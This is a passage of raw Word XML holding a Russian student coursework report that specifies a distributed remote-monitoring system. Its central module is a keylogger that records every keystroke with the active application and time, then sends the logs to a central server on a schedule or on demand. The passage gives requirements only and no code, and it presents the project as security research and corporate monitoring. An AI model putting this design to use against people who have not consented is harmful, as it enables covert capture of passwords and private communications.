    <w:p w14:paraId="5B3A1FB0" w14:textId="77777777" w:rsidR="001E6BF1" w:rsidRPr="00696F7E" w:rsidRDefault="001A7763" w:rsidP="000B75DC">
      <w:pPr>
        <w:pStyle w:val="21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 w:rsidRPr="00696F7E">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r w:rsidR="00BA5323" w:rsidRPr="00696F7E">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00EF5BEF" w:rsidRPr="00696F7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Руководство пользователя</w:t>
      </w:r>
      <w:r w:rsidR="002227B1" w:rsidRPr="00696F7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> программы</w:t>
      </w:r>
      <w:r w:rsidR="00742A0B" w:rsidRPr="00696F7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="007E6EF6" w:rsidRPr="00696F7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A0DA7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE901B" w14:textId="77777777" w:rsidR="001E6BF1" w:rsidRPr="009A49FA" w:rsidRDefault="001E6BF1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>Заключение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25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784B4E98" w14:textId="77777777" w:rsidR="001E6BF1" w:rsidRPr="009A49FA" w:rsidRDefault="00CF64DA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 w:rsidRPr="009A49FA">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Список </w:t>
      </w:r>
      <w:r w:rsidR="00727094" w:rsidRPr="009A49FA">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>использованных источников</w:t>
      </w:r>
      <w:r w:rsidR="00742A0B" w:rsidRPr="009A49FA">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="007E6EF6" w:rsidRPr="009A49FA">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A0DA7">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1327E8" w14:textId="77777777" w:rsidR="002C1EBC" w:rsidRDefault="00EB5C03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 w:rsidRPr="009A49FA">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidR="008B4C09" w:rsidRPr="009A49FA">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>риложение</w:t>
      </w:r>
      <w:r w:rsidR="009D56A6" w:rsidRPr="009A49FA">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> А</w:t>
      </w:r>
      <w:r w:rsidR="008B4C09" w:rsidRPr="009A49FA">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001E6BF1" w:rsidRPr="009A49FA">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D78D5" w:rsidRPr="009A49FA">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Исходный код программы</w:t>
      </w:r>
      <w:r w:rsidR="008B4C09" w:rsidRPr="009A49FA">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="0086220A" w:rsidRPr="009A49FA">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A0DA7">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EEF7E1" w14:textId="77777777" w:rsidR="009D56A6" w:rsidRDefault="001A0DA7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Б</w:t>
      </w:r>
      <w:r w:rsidRPr="001A0DA7">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001A0DA7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A0DA7">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Исходный код юнит-тестов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA82B4F" w14:textId="77777777" w:rsidR="009D56A6" w:rsidRDefault="009D56A6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D9254DC" w14:textId="77777777" w:rsidR="001E6BF1" w:rsidRPr="008B4C09" w:rsidRDefault="003A7509" w:rsidP="000B75DC"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31CE49A0" w14:textId="77777777" w:rsidR="00BD6214" w:rsidRDefault="00BD6214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41D2D3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условиях стремительного развития цифровых технологий и широкого распространения удалённого взаимодействия между пользователями и компьютерными системами возрастает потребность в эффективных средствах удалённого мониторинга и управления. Такие программные решения находят применение в различных сферах — от системного администрирования до обеспечения информационной безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3941AF3C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Одним из направлений в данной области является создание программных средств, способных фиксировать и анализировать действия пользователя. Одним из таких инструментов выступает кейлоггер — программа, регистрирующая нажатия клавиш на клавиатуре. Несмотря на то, что кейлоггеры часто ассоциируются с вредоносной деятельностью, их изучение и моделирование позволяют глубже понять потенциальные угрозы, которые могут возникать в корпоративной или личной информационной среде. Разработка собственного безопасного кейлоггера позволяет осознанно изучить механизмы работы подобного рода программ и тем самым повысить уровень защищённости систем от внешнего вмешательства.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EC6EAF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В рамках данной работы кейлоггер выступает в качестве одного из модулей распределённого программного средства удалённого управления, демонстрируя возможность централизованного сбора и анализа пользовательской активности на удалённых устройствах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345EF9E7" w14:textId="77777777" w:rsidR="00D631CE" w:rsidRP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>Кроме исследовательских целей, подобные решения могут использоваться в корпоративной среде для мониторинга действий сотрудников, в образовательных целях — для анализа поведения пользователей, а также в технических экспериментах, направленных на изучение принципов удалённого взаимодействия между компонентами информационной системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0C60B3" w14:textId="77777777" w:rsidR="00D631CE" w:rsidRDefault="00D631CE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D631CE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">С учётом вышеизложенного, целью данной курсовой работы является создание программного средства распределённого удалённого управления, способного фиксировать пользовательские действия и передавать их для последующего анализа. Особое внимание при этом уделяется архитектуре системы, обеспечению стабильности её работы и возможностям масштабирования. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA37F90" w14:textId="0B8C93BD" w:rsidR="002367A3" w:rsidRDefault="00EA5153" w:rsidP="00D631C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</w:t>
      </w:r>
      <w:r w:rsidR="002367A3">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> настоящей пояснительной записке отражены следующие </w:t>
      </w:r>
      <w:r w:rsidR="00124415">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>этапы</w:t>
      </w:r>
      <w:r w:rsidR="00037F3A">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> написания курсового</w:t>
      </w:r>
      <w:r w:rsidR="002367A3">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00037F3A">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>проекта</w:t>
      </w:r>
      <w:r w:rsidR="002367A3">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E617E1E" w14:textId="77777777" w:rsidR="002367A3" w:rsidRPr="001156F3" w:rsidRDefault="00584FA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szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584FA3">
        <w:rPr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  <w:r w:rsidR="002367A3" w:rsidRPr="001156F3">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Исследование области</w:t>
      </w:r>
      <w:r w:rsidR="001156F3" w:rsidRPr="001156F3">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> лицензирования ПО,</w:t>
      </w:r>
      <w:r w:rsidR="00C05B0B" w:rsidRPr="001156F3">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001156F3" w:rsidRPr="001156F3">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>необходимости разработки</w:t>
      </w:r>
      <w:r w:rsidR="002367A3" w:rsidRPr="001156F3">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="001156F3" w:rsidRPr="001156F3">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>формирование</w:t>
      </w:r>
      <w:r w:rsidR="005F5734" w:rsidRPr="001156F3">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> требований</w:t>
      </w:r>
      <w:r w:rsidR="002367A3" w:rsidRPr="001156F3">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3037AF" w14:textId="77777777" w:rsidR="002367A3" w:rsidRPr="00906FD1" w:rsidRDefault="005558D9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5558D9">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Анализ требований к программному средству и разработка функциональных требований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 xml:space="preserve">. На основе поставленных требований описывается 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lastRenderedPageBreak/>
        <w:t>функциональность программного средства</w:t>
      </w:r>
      <w:r w:rsidR="00906FD1" w:rsidRPr="00906FD1">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> и</w:t>
      </w:r>
      <w:r w:rsidR="001B257C" w:rsidRPr="00906FD1">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> представляется укрупнённая схема алгоритма </w:t>
      </w:r>
      <w:r w:rsidR="006B284E" w:rsidRPr="006B284E">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>программного средства</w:t>
      </w:r>
      <w:r w:rsidR="005F5734" w:rsidRPr="00906FD1">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD53F44" w14:textId="77777777" w:rsidR="000E3503" w:rsidRPr="00CA7296" w:rsidRDefault="00487F6E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487F6E">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Проектирование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 xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001B257C" w:rsidRPr="00CA7296">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">Определение </w:t>
      </w:r>
      <w:r w:rsidR="00D903A3">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>механизмов реализации неблокирующего пользовательского интерфейса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и основных положений, принимаемых при </w:t>
      </w:r>
      <w:r w:rsidR="00A01420">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>проектировании</w:t>
      </w:r>
      <w:r w:rsidR="007B42E1" w:rsidRPr="00CA7296">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> программного средства</w:t>
      </w:r>
      <w:r w:rsidR="00DE0BAC" w:rsidRPr="00CA7296">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E8F5EF" w14:textId="749F9538" w:rsidR="000E3503" w:rsidRPr="00263815" w:rsidRDefault="002D451F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2D451F">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Разработка</w:t>
      </w:r>
      <w:r w:rsidR="0023117C" w:rsidRPr="0023117C">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> программного средства</w:t>
      </w:r>
      <w:r w:rsidR="000E3503" w:rsidRPr="00263815">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005C3D83" w:rsidRPr="00263815">
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidR="002227B1" w:rsidRPr="00263815">
        <w:t>писание</w:t>
      </w:r>
      <w:r w:rsidR="005C3D83" w:rsidRPr="00263815">
        <w:t xml:space="preserve"> модулей и компонентов </w:t>
      </w:r>
      <w:r w:rsidR="0095643B" w:rsidRPr="00263815">
        <w:t>программного средства</w:t>
      </w:r>
      <w:r w:rsidR="00263815">
        <w:t>, а также обоснование выб</w:t>
      </w:r>
      <w:r w:rsidR="00BE1BC7">
        <w:t>ранных решений относительно функциональных требований</w:t>
      </w:r>
      <w:r w:rsidR="000E3503" w:rsidRPr="00263815">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2FB0AF" w14:textId="77777777" w:rsidR="00033540" w:rsidRPr="006E4EC4" w:rsidRDefault="00732603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732603">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Тестирование, проверка работоспособности и анализ полученных результатов</w:t>
      </w:r>
      <w:r w:rsidR="002A55F5" w:rsidRPr="006E4EC4">
        <w:t xml:space="preserve">. Характеристика действий, </w:t>
      </w:r>
      <w:r w:rsidR="006E4EC4" w:rsidRPr="006E4EC4">
        <w:t>выполненных</w:t>
      </w:r>
      <w:r w:rsidR="002A55F5" w:rsidRPr="006E4EC4">
        <w:t xml:space="preserve"> для проведения полного тестирования программного средства.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9A01C4" w14:textId="77777777" w:rsidR="002A55F5" w:rsidRPr="006D3E80" w:rsidRDefault="002A55F5" w:rsidP="00133F2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 w:rsidRPr="006D3E80">
        <w:t>Руководство пользователя</w:t>
      </w:r>
      <w:r w:rsidR="002227B1" w:rsidRPr="006D3E80">
        <w:t xml:space="preserve"> программы</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3E80">
        <w:t>. Включает в себя последовательно</w:t>
      </w:r>
      <w:r w:rsidR="002227B1" w:rsidRPr="006D3E80">
        <w:t>сти действий, выполнение которых</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3E80">
        <w:t xml:space="preserve"> пользователем</w:t>
      </w:r>
      <w:r w:rsidR="001B257C" w:rsidRPr="006D3E80">
        <w:t xml:space="preserve"> приведёт к успешному решению</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3E80">
        <w:t xml:space="preserve"> определённых задач.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B428E07" w14:textId="77777777" w:rsidR="005B0182" w:rsidRPr="006C6340" w:rsidRDefault="007B2C41" w:rsidP="00133F22">
      <w:pPr>
        <w:pStyle w:val="af1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spacing w:val="-6"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002227B1">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00584FA3" w:rsidRPr="00584FA3">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>АНАЛИЗ ПРОТОТИПОВ, ЛИТЕРАТУРНЫ</w:t>
      </w:r>
      <w:r w:rsidR="00584FA3">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Х ИСТОЧНИКОВ И ФОРМИРОВАНИЕ ТРЕ</w:t>
      </w:r>
      <w:r w:rsidR="00584FA3" w:rsidRPr="00584FA3">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>БОВАНИЙ К ПРОЕКТИРУЕМОМУ ПРОГРАММНОМУ СРЕДСТВУ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334F6382" w14:textId="77777777" w:rsidR="002A7F74" w:rsidRPr="00824102" w:rsidRDefault="00E176A5" w:rsidP="00133F22">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824102">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Анализ</w:t>
      </w:r>
      <w:r w:rsidR="00584FA3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> литературных источников,</w:t>
      </w:r>
      <w:r w:rsidR="007C0502">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> существующих решений и</w:t>
      </w:r>
      <w:r w:rsidRPr="00824102">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A2656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>необходимости разработки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A93837" w14:textId="77777777" w:rsidR="0085655A" w:rsidRPr="006C6340" w:rsidRDefault="0085655A" w:rsidP="000B75DC">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E0B2CC1" w14:textId="095D7434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Современные корпоративные и информационные системы всё чаще переходят к распределённой архитектуре с активным использованием средств удалённого мониторинга и управления. Это особенно актуально в условиях масштабирования инфраструктур, перехода к гибридным и облачным средам, а также удалённой работы сотрудников. Программные средства удалённого управления позволяют централизованно отслеживать состояние клиентских устройств, проводить диагностику, оказывать техническую поддержку и при необходимости собирать данные о действиях пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443FBD72" w14:textId="3132EA90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На рынке существует множество коммерческих решений в этой области — таких как TeamViewer, AnyDesk, Radmin, Ammyy Admin и другие. Однако большинство из них нацелено на визуальное удалённое подключение и поддержку, а не на автоматический сбор информации о действиях пользователя. Кроме того, открытые или бесплатные решения редко предоставляют гибкость и расширяемость, необходимую для встроенного мониторинга, передачи данных по расписанию и глубокого взаимодействия между клиентом и сервером.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1EA620" w14:textId="7D012D47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Кейлоггеры, несмотря на негативную репутацию, являются важным объектом изучения в области информационной безопасности. Понимание принципов работы таких программ позволяет выявлять уязвимости, улучшать системы защиты и разрабатывать методы противодействия вредоносным инструментам. Анализ деятельности кейлоггеров особенно важен для специалистов, работающих в области кибербезопасности, администрирования корпоративных сетей и разработки защитного программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A03CEB2" w14:textId="2604494D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Поскольку большинство кейлоггеров и аналогичных программ относятся к категории вредоносного ПО, их архитектура и принципы работы не освещаются в официальных источниках. Это затрудняет исследование </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>существующих решений</w:t>
      </w:r>
      <w:r w:rsidRPr="002D22A8">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>. Научные публикации в данной области, как правило, ограничены теоретическим описанием угроз, без углублённого анализа реализации средств мониторинга.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4355FF57" w14:textId="613F92DB" w:rsidR="002D22A8" w:rsidRPr="002D22A8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 xml:space="preserve">Таким образом, разработка и моделирование безопасного распределённого программного средства удалённого управления, включающего модуль кейлоггера, актуальны как с исследовательской, так и с практической точки зрения. Это позволяет с одной стороны — повысить осведомлённость о возможных угрозах, а с другой — продемонстрировать, как подобные решения могут быть реализованы в рамках правомерных задач, например, для изучения пользовательского поведения, технической </w:t>
      </w:r>
      <w:r w:rsidRPr="002D22A8">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>диагностики или обеспечения внутренней безопасности корпоративных систем.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9EE3AC" w14:textId="0D7CE0CC" w:rsidR="006C6340" w:rsidRDefault="002D22A8" w:rsidP="002D22A8">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D22A8">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Разработка собственного решения также позволяет детально проанализировать механизмы взаимодействия между клиентом и сервером, оценить особенности работы в сетевой среде, рассмотреть архитектуру распределённых систем и протестировать различные подходы к передаче, хранению и визуализации данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC8B313" w14:textId="77777777" w:rsidR="002D22A8" w:rsidRPr="006C6340" w:rsidRDefault="002D22A8" w:rsidP="002D22A8">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="039139A5" w14:textId="77777777" w:rsidR="002A7F74" w:rsidRPr="00824102" w:rsidRDefault="002A7F74" w:rsidP="00133F22">
      <w:pPr>
        <w:pStyle w:val="af1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1418" w:hanging="709"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824102">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Формирование</w:t>
      </w:r>
      <w:r w:rsidRPr="00824102">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824102">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>требований к проектируемому программному средству</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755D21AA" w14:textId="77777777" w:rsidR="0085655A" w:rsidRDefault="0085655A" w:rsidP="000B75DC">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDBB6C1" w14:textId="0E07EFFA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Целью разрабатываемого программного средства является создание распределённой системы удалённого контроля, предназначенной для централизованного сбора, хранения и анализа данных, поступающих с пользовательских устройств, на которых установлен агент-наблюдатель — кейлоггер. Система должна обеспечивать автоматизированный сбор информации о действиях пользователей, её безопасную передачу на центральный сервер, а также предоставлять веб-интерфейс для мониторинга и управления полученными данными.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1F866F" w14:textId="600CE786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Ключевым элементом системы является программный модуль-кейлоггер. Он устанавливается на целевых пользовательских устройствах и выполняет непрерывную фиксацию всех нажатий клавиш. При этом </w:t>
      </w:r>
      <w:r w:rsidR="003B705F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>он</w:t>
      </w:r>
      <w:r w:rsidRPr="002F2FDC">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> должен сохранять не только последовательность нажатых клавиш, но и сопутствующую контекстную информацию: название и идентификатор активного приложения, в котором производился ввод, а также точное время и дату каждого действия. Данные должны накапливаться в виде текстовых файлов и сохраняться локально на устройстве до момента передачи на сервер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE00CF7" w14:textId="6264D5B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Передача информации от кейлоггера на сервер должна происходить автоматически по заданному расписанию (например, каждые N минут), а также по специальному событию — например, при значительном накоплении данных или по прямому запросу со стороны сервера. Для реализации более гибкого обмена данными необходимо предусмотреть двустороннюю синхронизацию: сервер должен иметь возможность инициировать досрочную отправку логов, не дожидаясь следующего планового запроса от клиента.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E6564F" w14:textId="1CBC80E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 xml:space="preserve">Серверная часть программного комплекса должна представлять собой REST API-приложение, обрабатывающее входящие запросы, сохраняющее переданную информацию и предоставляющее интерфейс для доступа к этим данным. В целях простоты и отказоустойчивости данные на сервере должны храниться в виде файловой системы: каждому устройству соответствует отдельный файл или каталог, содержащий переданные с него </w:t>
      </w:r>
      <w:r w:rsidR="003B705F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>логи.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106B14F6" w14:textId="31F6D44B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Для взаимодействия с системой пользовател</w:t>
      </w:r>
      <w:r w:rsidR="003B705F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ей</w:t>
      </w:r>
      <w:r w:rsidRPr="002F2FDC">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> предоставляется фронтенд-интерфейс. Интерфейс должен обеспечивать удобный просмотр собранных логов. Также </w:t>
      </w:r>
      <w:r w:rsidR="003B705F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">должна быть </w:t>
      </w:r>
      <w:r w:rsidRPr="002F2FDC">
